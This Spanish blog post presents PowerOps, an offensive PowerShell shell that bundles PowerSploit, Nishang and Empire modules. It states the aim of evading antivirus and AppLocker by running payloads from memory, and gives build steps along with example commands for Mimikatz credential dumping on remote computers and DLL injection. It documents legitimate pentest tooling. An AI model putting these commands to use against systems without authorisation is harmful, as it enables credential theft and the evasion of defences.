PowerOps: haciendo más fácil el pentesting con PowerShell
Se trata de seguir el principio KISS, siendo lo más simple posible. El objetivo principal es hacer que sea fácil usar PowerShell ofensivamente y ayudar a evitar las soluciones antivirus y otras de mitigación. Esto se hace principalmente de dos formas:
- No basándose en powershell.exe, llamando a PowerShell directamente a través del marco .NET, lo que podría ayudar a pasar por controles de seguridad como GPO, SRP y App Locker.
- Los payloads se ejecutan desde la memoria (cadenas codificadas en base64) y nunca tocan el disco, evadiendo la mayoría de los antivirus.
PowerOps se inspira en Cn33liz/p0wnedShell. PowerOps ofrece básicamente un símbolo del sistema PowerShell interactivo con las herramientas PowerShell que incluye y, además, permite ejecutar cualquier comando válido PowerShell.
Herramientas/funciones que incluye:
- PowerShellMafia/Powersploit
- Get-Keystrokes
- Invoke-DllInjection
- Invoke-Mimikatz
- Invoke-NinjaCopy
- Invoke-Shellcode
- Invoke-ReflectivePEInjection
- Invoke-TokenManipulation
- Invoke-WMICommand
- PowerUp
- PowerView
- Nishang
- Get-Information
- Get-PassHashes
- Port-Scan
- Auto-GPPPassword
- PowerCat
- Get-ProductKey
- Empire
Para compilar PowerOPS es necesario importarlo a Microsoft Visual Studio o, si no se tiene, compilarlo de la siguiente manera:
Como binario x86:
cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (Or newer .NET version folder)
csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:C:\users\username\PowerOPS_x86.exe /platform:x86 "C:\path\to\PowerOPS\PowerOPS\*.cs"Como binario x64:
cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (Or newer .NET version folder)
csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:C:\users\username\PowerOPS_x64.exe /platform:x64 "C:\path\to\PowerOPS\PowerOPS\*.cs"PowerOps utiliza el espacio de nombres System.Management.Automation, así que hay que asegurarse de que System.Management.Automation.dll está dentro del source path al compilar fuera de Visual Studio.
Cómo usarlo
Ejecuta el binario y escribe 'show' para ver los módulos disponibles:
PS > show
[-] This computer is not part of a Domain! Some functions will not work!
[+] Nishang
Get-Information Get-PassHashes Port-Scan
[+] PowerSploit
Get-KeyStrokes Invoke-DllInjection Invoke-Mimikatz Invoke-NinjaCopy
Invoke-Shellcode Invoke-TokenManipulation Invoke-WmiCommand Invoke-ReflectivePEInjection
PowerView PowerUp
[+] Empire
Invoke-PsExec Invoke-SSHCommand
[+] Others
Auto-GPPPassword Get-ProductKey PowerCat
PS >PowerUp y PowerView se cargan como módulos, por lo que hay que usar Get-Command -module para mostrar todas las funciones disponibles:
PS > get-command -module powerup
CommandType Name ModuleName
----------- ---- ----------
Function Find-DLLHijack PowerUp
Function Find-PathHijack PowerUp
Function Get-ApplicationHost PowerUp
Function Get-ModifiableFile PowerUp
Function Get-RegAlwaysInstallElevated PowerUp
Function Get-RegAutoLogon PowerUp
Function Get-ServiceDetail PowerUp
Function Get-ServiceFilePermission PowerUp
Function Get-ServicePermission PowerUp
Function Get-ServiceUnquoted PowerUp
Function Get-UnattendedInstallFile PowerUp
Function Get-VulnAutoRun PowerUp
Function Get-VulnSchTask PowerUp
Function Get-Webconfig PowerUp
Function Install-ServiceBinary PowerUp
Function Invoke-AllChecks PowerUp
Function Invoke-ServiceAbuse PowerUp
Function Invoke-ServiceDisable PowerUp
Function Invoke-ServiceEnable PowerUp
Function Invoke-ServiceStart PowerUp
Function Invoke-ServiceStop PowerUp
Function Restore-ServiceBinary PowerUp
Function Test-ServiceDaclPermission PowerUp
Function Write-HijackDll PowerUp
Function Write-ServiceBinary PowerUp
Function Write-UserAddMSI PowerUp
PS >PowerOps es básicamente un shell de PowerShell con algunos módulos y funciones pre-cargados. Así que con Get-Help también podemos encontrar la manera de utilizar los módulos.
Por ejemplo si queremos ver cómo utilizar Invoke-Mimikatz:
PS > Get-Help Invoke-Mimikatz -examples
NAME
Invoke-Mimikatz
SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to
reflectively load Mimikatz completely in memory. This allows you to do
things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed
against multiple computers.
This script should be able to dump credentials from any version of Windows
through Windows 8.1 that has PowerShell v2 or higher installed.
Function: Invoke-Mimikatz
Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog:
http://blog.gentilkiwi.com. Email: [email protected]. Twitter
@gentilkiwi
License: http://creativecommons.org/licenses/by/3.0/fr/
Required Dependencies: Mimikatz (included)
Optional Dependencies: None
Version: 1.5
ReflectivePEInjection version: 1.1
Mimikatz version: 2.0 alpha (2/16/2015)
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Execute mimikatz on the local computer to dump certificates.
Invoke-Mimikatz -DumpCerts
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Execute mimikatz on two remote computers to dump credentials.
Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2")
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Execute mimikatz on a remote computer with the custom command
"privilege::debug exit" which simply requests debug privilege and exits
Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"
PS >O simplemente mirar toda la ayuda disponible para Invoke-DllInjection:
PS > Get-Help Invoke-DllInjection -full
NAME
Invoke-DllInjection
SYNOPSIS
Injects a Dll into the process ID of your choosing.
PowerSploit Function: Invoke-DllInjection
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Invoke-DllInjection [-ProcessID] <Int32> [-Dll] <String>
[<CommonParameters>]
DESCRIPTION
Invoke-DllInjection injects a Dll into an arbitrary process.
PARAMETERS
-ProcessID <Int32>
Process ID of the process you want to inject a Dll into.
Required? true
Position? 1
Default value 0
Accept pipeline input? false
Accept wildcard characters? false
-Dll <String>
Name of the dll to inject. This can be an absolute or relative path.
Required? true
Position? 2
Default value
Accept pipeline input? false
Accept wildcard characters? false
<CommonParameters>
This cmdlet supports the common parameters: Verbose, Debug,
ErrorAction, ErrorVariable, WarningAction, WarningVariable,
OutBuffer, PipelineVariable, and OutVariable. For more information, see
about_CommonParameters (http://go.microsoft.com/fwlink/?LinkID=113216).
INPUTS
OUTPUTS
NOTES
Use the '-Verbose' option to print detailed information.
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Invoke-DllInjection -ProcessID 4274 -Dll evil.dll
Description
-----------
Inject 'evil.dll' into process ID 4274.
RELATED LINKS
http://www.exploit-monday.com
PS >Fuente: https://github.com/fdiskyou/PowerOPS
Via: www.hackplayers.com
PowerOps: haciendo más fácil el pentesting con PowerShell
Reviewed by Zion3R
on
18:50
Rating:
Reviewed by Zion3R
on
18:50
Rating:
